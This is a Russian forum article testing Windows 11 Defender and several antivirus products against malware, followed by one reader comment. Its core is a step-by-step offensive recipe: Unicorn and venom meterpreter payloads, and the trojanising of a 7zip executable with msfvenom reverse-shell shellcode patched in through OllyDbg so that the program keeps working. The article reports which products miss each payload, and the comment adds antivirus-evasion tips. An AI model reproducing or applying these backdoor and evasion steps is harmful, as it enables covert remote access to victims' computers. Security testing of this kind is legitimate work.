Статья Проделки Майкрософт: развенчание абсолютной безопасности от Билла Гейтса - история тотального провала: Defender & Windows 11

Предисловие

win-defender-keygen.gif
giphy.gif

Привет, и начнем мы с вопроса, что не свойственно моим работам. Как вы понимаете слово "безопасность"? Существует ли понятие абсолютной защищенности? У каждого может быть свой ответы на эти вопросы, но у меня это вызывает лишь категорическое отрицание. Ведь мы живем в эпоху, поистине удивительную, здесь сочетается как невероятный технический прогресс, так и до абсурдности глупая деградация. И это действительно уникально, ведь в одно время с тем, как кто-то пытается изобрести новый способ защиты, на другом конце провода с петлей на шее висит человек, которому все по барабану. А ведь так было не всегда, убери прогресс - уйдут и проблемы, но кому из современных жителей планеты нравится каменный век? А на вопрос "Было ли раньше лучше?" - отвечать не станем, предоставим это фактам и истории, а именно о истории этот цикл и вещает - Историческая вирусология, предыдущие статьи здесь:

1. Немного ностальгии: историческая вирусология или LoveLetter в цвете современности - 22 года спустя
2. Историческая вирусология: или 40 миллиардов долларов за 18 лет - MyDoom: хронология, история, анализ
3. Историческая вирусология: Чернобыль — как это было на самом деле или как заставить ваш ПК полететь из окна: история, хронология, анализ - CIH
4. Историческая вирусология: разговор о первом черве - или как одна ошибка изменила ход истории - Morris Worm
5. Историческая вирусология: раняя хронология программ-вымогателей - AIDS, GPcode, Arhivarius. Или как шутка психически больного стала каноном
6. Историческая вирусология: поздняя хронология программ-вымогателей - ZeuS, CryptoLocker, CTB: вирусный трафик ценой в миллиарды. Часть 1
7. Историческая вирусология: локер Илона Маска или как открылась Тесла - поздняя хронология программ вымогателей. Часть 2
8. Историческая вирусология: американский школьник и 250 миллионов - Blaster Worm: история, хронология, анализ
9. Историческая вирусология: Политически предубежденный вирус или как очередное исследование зашло не в ту степь - Confiker: история, хронология, анализ
10. Историческая вирусология: безумное китайское творение, натворившее дел - червь Nimda: история, хронология, анализ
11. Историческая вирусология: Червь рекордсмен или как ошибка исследователей привела к тотальному параличу - SQL Slammer: хронология, история, анализ

Хотя этот выпуск будет особенный, ведь это кроссовер моих двух новых форматов: Вирусологии и Магической битвы, потому оставлю ссылочки и на неё:

  1. Магическая битва: последний Виндоус - противостояние: 11 vs 10: Mrs. Major 2.0, Petya, Wanna Cry и самоуничтожающийся антивирус
2. Магическая битва: последний Виндоус - противостояние: Windows 11 vs Win 7&10 или как безымянный вирус положил всех на лопатки

И все равно я поражаюсь тому, как жизни свойственно меняться, какое-то одно незначительно решение способно завести вас в тупик или, хуже того, вовсе убить. Но не все ваши решения ведут к фатальному исходу, может быть потому эта статья пишется первой в новой квартирке. Но сегодня мы не о этом, в рамках этого кроссоверного выпуска мы будем издеваться над различными антивирусными программами, используя как исторические вредоносы, как и самоделки моих знакомых, новинки тоже стороной не обойдем. На этом этапе вам может показаться это скучным, но читали бы вы это, раз так было бы на самом деле? Вся суть в том, что Майкрософт недавно выпустил новую версию Виндоус, над которой мы уже изрядно так поиздевались.

А недавно я и вовсе заметил новость, якобы Билли Гейтс выпускает “универсальное” антивирусное ПО, которое будет работать, как на Виндоус , так и Андроид с IOS, его компания яро заявляет, мол это абсолютная защита. И появилась у меня идейка написать выпуск, в котором мы сравним этот антивирус с аналогами и базовой защитой 11-й версии винды. Да начнется хаос! но сперва:

Дисклеймер

На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект — это знания.

И напоминаю, что в рамках этой связки статей у нас действует конкурс на 5.555 рублей, а связан он с отсылками в моих работах: культовые фильмы, анимешки да и просто мемы с играми. Узнали? Пишите комментарий, ведь тот, кто раздает все пасхалки - получит денежку.


Проделки Майкрософт: развенчание абсолютной безопасности от Билла Гейтса - история тотального провала

Итак, прежде чем приступить к самим тестам, давайте разберемся, что же это за антивирус такой. А название было дано ему очень прозаичное - Дефендер, якобы защитник. Вышла эта штуковина 16 июня 2022 года, стало быть три дня назад.

Представляет он собой кросс-платформенное приложение, которое предназначено для обычных людей, вроде алкаша Пети из третьего класса. Оно работает как упрощенная панель инструментов, которая подключается к существующему антивирусному программному обеспечению или предлагает дополнительную защиту устройства. Вот здесь уже становится немного интересно, ведь если у него есть метод интеграции в существующий антивирус, не возникнет ли конфликтов с популярными приложениями для защиты? И вообще, зачем эта интеграция, если можно попросту было выпустить полноценную версию ПО?

Идем дальше, например, в iOS и iPad iOS нет антивирусной защиты, просто вот по дефолту, и вместо этого приложение предлагает некоторые средства защиты от веб-фишинга вместе с панелью управления, которая включает предупреждения для других устройств. То есть о полноценной защите речь и не идет, даже сам представитель компании сделал заявление, что приложение ещё не готово и оно не способно выполнять свои обязанности на сто процентов. Тогда смысл вообще выпускать вот такой продукт в свет? Я вижу в этом исключительно абсурд и попытку сделать что-либо, дабы отвернуть внимание от явно провалившейся виндоус 11, которую давайте-ка я сейчас установлю быстренько. Хотя стоп, быстро не выйдет, это же одиннадцатая, ха-ха.

Screenshot_87.png


Как же я рад, что научился быстро обходить редактирование реестра, сперва давайте составим список вредоносов, которые мы будем использовать, здесь особо не будет каких-то именитых вирусов, так как с вероятностью в 99% их хеши уже есть в базах. Нам же нужно оценить именно саму работу сканирования процессов, поймет ли стандартный защитник виндоус, что в системе что-то происходит, и как он будет действовать, если таки удосужится заметить. Вот, что составляет основную часть моего интереса.

Из прошлых статей цикла Магическая Битва, вы уже могли заметить, что выключить дефендер на 11-ом полностью - практически невыполнимая задача: он предупреждает, он что-то блокирует и не дает запускаться потенциально опасным файлам . Безусловно похвально.

Итак, список потенциально опасных программ, которыми будем проводить тесты:

  1. Стандартный и уже классический Метасплоит, но давайте немного заморочимся и создадим кастомную полезную нагрузку, ведь от дефолтной, естественно, мы ничего не получим. Используем несколько способов и посмотрим сработает ли что-то.
  2. Самостоятельно создадим простенький злой PE: дело достаточно нехитрое, но требует скрупулезности.
  3. Проверим гвоздя нашего прошлого выпуска - Монооксидa. Напомню, что он подчистую уничтожил 11-ю.
  4. Миссис Мажор всех версий: 2.0, 3.0, 4.0. Они особо не отличаются, да и эта версия ОС имеет неплохую резистентность к такому.
  5. Различные вирусняки, которые вы мне накидали для анализа в телеграмм, за что я благодарен. Сперва мы их проанализируем, разберемся что и как они делают, а после уже и запустим.
Конечно же наши тесты не будут ограничены Виндоус 11, сперва мы сравним стандартную защиту 12-го андроида и 16-ой IOS, а после установим тот самый антивирус от Майкрософт и поглядим на результаты.


Итак, полезная нагрузка значится. Пришла мне идея и вовсе попытаться воссоздать когда-то актуальный Unicorn-Повершелл пейлоад. На данный момент она уже не работает так как должна, ибо использовала в своей основе лишь старые версии PowerShell, но чем черт не шутит. Давайте протестируем. Идем в Кали и устанавливаем Юникорн:
Код:
git clone https://github.com/trustedsec/unicorn
cd unicorn/

Затем просмотрим доступные опции для генерации:
Код:
./unicorn.py --help

Но уже на этом моменте меня заинтересовал ещё и вариант со злым URL-ом, потому задействуем и его, но потом. Сперва выбираем интересующую нас в первую очередь нагрузку:
Код:
python unicorn.py windows/meterpreter/reverse_https 192.168.42.1 443

У нас сразу же создается два файла - powershell_attack.txt , в котром расположены команды Павершелл, которые будут выполняться на целевой машине. А второй - unicorn.rc - отвечает за автоматизацию запуска слушателя с нужной конфигурацией.

Ну и теперь давайте импортируем сие дело в Метасплоит:
Код:
msfconsole -r /opt/unicorn/unicorn.rc

Ну вот как бы и все, теперь осталось открыть консоль Повершелл и вставить туда вредоносный код из первого файла. Результат… Очевиден, сама консоль не дала запустить вредоносный скрипт. Только вот… Зачем Виндоус 11 начала восстанавливать зараженные файлы из первой части Магической Битвы. Господи. Я не понимаю эту систему. Зачем… Это со включенным стандартным дефендером, она грузит Мисис Мажор 2.0 и никак не препятствует его работе, ну, в ограниченном варианте. Это прикол? Шутка, да?

Screenshot_81.png


А-а, то есть если запустить не через прямую консоль Повершелл, а через .bat, то у нас откроется сессия метерпретер. Почему это работает… Господи, кстати, на десятке такая фича не пройдёт, она заблокирует, что .bat, что команду в Повершелл.

Окей, упустим. Теперь мне захотелось использовать очень старый, но достаточно хитрый метод с использованием того же Метерпретер, но уже с помощью замаскированного HTA. Сперва установим нужный репозиторий из ГитХаб:
Код:
git clone https://github.com/r00t-3xp10it/venom.git
cd venom

А затем и запустим сам скрипт:
Код:
./venom.sh

Так-с, далее идет процесс установки зависимых пакетов, а после открывается прекрасное меню в консоле, нас интересуют. М-м-м, наверное, полезные нагрузки под Виндоус.

Интересует здесь нас девятый пункт - HTA ShellCode. После вводим свой локальный IP адрес, в моем случае это 192.168.42.129 и рандомный порт, пусть будет 666.

В качестве основы полезной нагрузки используем meterpreter/reverse_tcp , ну классика. Вводим рандомное название и начинается самый сок. Выбираем сервер Апачи2 для доставки исполняемого вредоноса на машину жертвы, это у нас наша 11-я. Теперь постэксплуатационный метод, здесь можно выбрать любой, в зависимости от преследуемых целей. Пожалуй просто выберу первый да и все. Кстати, забавно, что даже сейчас процент обнаружения этой штуковины составляет 5 из 56, очень даже достойно.

Сразу же осуществляем переход по локальному адресу нашей машины на Кали, но уже в окне браузера испытуемой 11-ой версии. Сам браузер блокирует скачивание файла, но даже если его открыть просто моргнет рабочий стол, ничего не произойдет. Ладненько.

Теперь PEшка. Раньше я уже создавал злой PE файл, потому использую ту же методику, в качестве подопытного выберем 7zip, так как он идеально соответствует критериям. О них я рассказывать не стану, так как когда-то посвятил целых две статьи под это, если кто помнит ещё.

Screenshot_82.png


Не станем искать пещеры в коде, а просто создадим новый заголовок, используя PE Lord, пусть он будет называться… Хм-м. vasa? Пусть. Размером он будет у нас в 1000 байт, аналогично и в шестнадцатеричном формате, естественно ставим галочки напротив доступности для записи и чтения. Работу сделали, можно закругляться. Стоп-стоп. Ты чего, автор? Теперь же даже архиватор не работает, ты что сделал. Ой, простите.

Так как теперь существует пустой заголовок, сам .exe работать не станет, скорее всего просто выдаст ошибку, мол приложение не может быть запущено.

Та-кс, теперь переходим к редактору хеша, сойдёт любой! Нам важно забить конец пустого заголовка нулями, хотя можно чем угодно. Пусть будут нули. Не будем использовать Олли, дабы убедиться, что все корректно сделали, мы уверены в своих действиях!

Сейчас нам важно перехватить поток исполнения только что добавленной секции, сначала давайте запишем первые 5 кодов операций, это вот они:
Код:
PUSHAD
PUSHFD
POPAD
POPFD
Restore Execution Flow...

Они понадобятся нам чуточку позже при восстановлении потока выполнения. Мы копируем начальный адрес раздела .vasa 0047E000, открываем программу в Ollydbg и заменяем первый код операции по адресу 004538D8 с JMP на 0047E000.

Так как делаю не впервые, объясняю туманно, простите, особо здесь подробности и не нужны, я считаю.

Чтобы добавить шелл-код, нам нужно поместить регистры в стек, чтобы сохранить их состояние с помощью кодов операций PUSHAD и PUSHFD. В конце шелл-кода мы возвращаем регистры и восстанавливаем поток выполнения, вставляя начальные , которые мы там записали выше, программные инструкции.

Теперь мы можем перейти в Кали и сгенерировать Веномом наш Реверс Шелл: Code:
Код:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.93 LPORT=4444 -a x86 --platform windows -f hex

В этой команде нет ничего необычного, просто шелл в HEX’е, на LPORT и LHOST сами знаете что писать. Ну, это было слишком просто, сейчас нам нужно будет вставить этот шелл в те самые свободные строки, но не просто сам этот хекс, а создать правильную последовательность, ну и не нарушить ту, которая уже имеется. Потому мы, используя следующую последовательность операторов, вставляем всё путем - Правая кнопка мыши - Edit - Binary - Binary PUSHAD PUSHFD shell POPAD POPFD.

WlQplNWB6mW9L9Uvdnfymr59aKQUFEd545o2xNg0expoPpB03rSP0yTerWIp2_bbrm-1ChxBMLhVs9OBkV1ibm541DwJzEJW-NMWHFdtMGuAfc15WMyQ9v0ra4vOyEQs8vywOX3--J6AsdKwxg


А здесь те самые пять инструкций-кодов, скопированных в начале. Вставляется это каждый раз в новую строку, а конечные коды, который были сначала, востановят поток данных. Теперь у нас есть тот самый шелл в нашем пустом разделе, сохраним для верности, так же само, как делали и в прошлый раз.

2Hu944DjoNan9KTzTN5PPU6mOlvXNpuVnq-I0xnFgidCWLbbBezxMDX5JZQRcsc5HFqC4JqKjPo6T-_dxmdINX9n1-tNs9u7_YZg9t8eXZ69C1fxr6Aj9CzAubR1KYYjmtLDGEoHwbrT1FWH7g


Ну и теперь можем немного модифицировать сие дело. Если рассмотреть детально, то можем заметить в конце код операции Call EBP, которая просто закрывает программу после того, как шелл выполнил свою функцию. Это нам вообще ни к чему, поэтому кликаем по нему левой мыши и ставим галочку напротив NOP. Следующая манипуляция будет связана с наличием объекта WaitForSingleObject, в нашем шелле. Отвечает она за ожидание перед запуском других потоков, Если мы выполним наш .EXE, он таки даст обратную оболочку, но нормальная работа 7zip остановится, пока мы не закроем наш шелл. Нам просто нужно изменить код операции DEC INC, значение которого -1, на NOP. В принципе, можно сохранять. Поехали, посмотрим как отреагирует одиннадцатая. Но прежде нужно запустить слушатель на Кали:
Код:
nc -lvnp 4444

Исход достаточно печальный, но не для нас, ведь открылась обратная оболочка. Дефендер молчит.

И тут я понял, что если продолжу разбирать все и по порядку, то статья выйдет на тысяч 30 символов, потому давайте разберем только два пункта, а во второй части захватим все, что не успели.

Screenshot_84.png


Но для разнообразия давайте закинем гвоздь программы - Монооксид, но не будем его запускать так как результат его работы известен. Но вот Дефендеру на него наплевать, просто наплевать, он никак не реагирует.

Ладно, скачаем-ка вот этот “универсальный антивирус” от Майкрософт, давайте глянем изменится ли что-то. Мг-г, исключительно для подписчиков 360 Cloud, окей. И вот спустя несколько минут, Дефендер уже установлен. Изменилось ли что-то? Давайте по пунктикам:

  1. Бат файл с полезной нагрузкой Повершелл был заблокирован, но сессию открыть успел. Позитивная динамика, конечно, есть, но что-то слабовато.
  2. Деятельность Мисис Мажор не прекратилась, он как был, так и остался, продолжая копироваться на рабочем столе. Что касаемо новых версий, то они блокировались и без этого дополнения, то есть запуск их был невозможен без отключения встроенного дефендера.
  3. Полезная нагрузка HTA, которая только вызывала мерцание экрана была успешно ликвидирована и расценена, как троянское ПО.
  4. PE файл 7zip оно как игнорировало, так и игнорирует, ему плевать.

Для контраста, давайте удалим эту штуковину и установим три популярных антивирусника - ESET, AVAST, а дефолтную защиту отключим. Ну и для прикола тот, которым пользуюсь я сам - Zemana.

Отчет по результативности работы ESET:

  1. Батник заблокирован, сессия не открыта.
  2. Он удалил Миссис Мажор 2.0 и поместил все файлы связанные с ним на карантин.
  3. HTA - удалена, троянское ПО.
  4. PE файл ликвидирован.
  5. Монооксид удален вместе с архивом.

Отчет результативности работы AVAST:

  1. Батник не блокирует никак, свободно открывается сессия, но после открытия он смекает, что что-то не так и убивает процесс.
  2. Миссис Мажор всех версий он детектит и не дает запускать.
  3. HTA - аналогично.
  4. На PE файл ему плевать, но так же убил процесс слушателя, не дав получить оболочку.
  5. Никакой реакции на Монооксид.

Ну и мой любимчик Zemana спокойно справился со всеми трудностями, даже Торрент удалил и Яндекс Браузер.

Итоги первой части

EjM3l4NBCrsZEcJZUL5PUfeiMtERjDPzcSNRkn3PyPfMIojny4JsYglt8NxDwxio0F22_zpIrUVFGeVj7GR1cu9vOI3fRC0I89wQ9Y8m8I-vU5iWlSpnwbtgKn_i7rqplEFzxmkZ737P4n66qQ


“здрастуйте. вечером запустил после работы как всегда танки "онлайн" и пошел дым чего то из под клавиатуры! и выключился ноут. не подскажите в чем может быть проблема и дорого ли делать ремонт??!!”.

Да, друг, потому что ты включил Виндоус и отключил мозги.

Именно таким образом я хочу начать подводить итоги этой части, так как здесь виноват даже не сам пользователь-дуболом, а Майкрософт. Да, именно они. Я никогда не был ни их критиком, ни их фанатом. Но начав писать о недостатках, пытался найти плюсы и какой-то позитив в этом всем. Не получилось, буду откровенным. На данный момент последняя версия самой популярной операционной системы в мире выглядит очень сыро. Не только из-за того, что самые банальные методы проникновения работают на ней, хотя это основной камень в их огород, но и интерфейс, эргономика отнюдь не радуют.

Выпуск какого-то там дополнения для антивирусов звучит просто смешно на фоне того, как стандартная защита, которая была взята для основы разработки этого кросс-платформенного дефендера, показывает себя в тестах.

Даже Аваст, ребята, Аваст, работает лучше. Которого я вовсе считаю одним из самых бесполезных популярных антивирусов.


Существует ли абсолютная безопасность? Выбросьте свои устройства в окно, удалите все аккаунты и может быть тогда.

А с вами был, как обычно.. Нет, как всегда, какой-то парень под ником DeathDay (и его редактор Яш), который искренне не понимает нынешних действий Майкрософта. Увидимся во второй части, там будет вообще жаришка. Не прощаюсь. Мира всем.

16.06.2022. Defender - история провала.​
 
Последнее редактирование:

Ondrik8

prodigy
Green Team
08.11.2016
1 132
3 173
reverse_TCP палится всеми кроме дефендера рекомендую на SSL переходить, тогда будет норм + прогружайте в память шелкод, оттуда же и стартовать) ну и принимать метасплойтом тоже грамотно нужно, т.к. по дефолту он прогружает вериф. сессии reverse-shell (не пишу уже про meterpreter c ним отдельная история shellcode+XOR+key и т.д.) так вот лучше грамотно настроить прием тогда результат вас удивит еще больше!
 
  • Нравится
Реакции: DeathDay
Мы в соцсетях: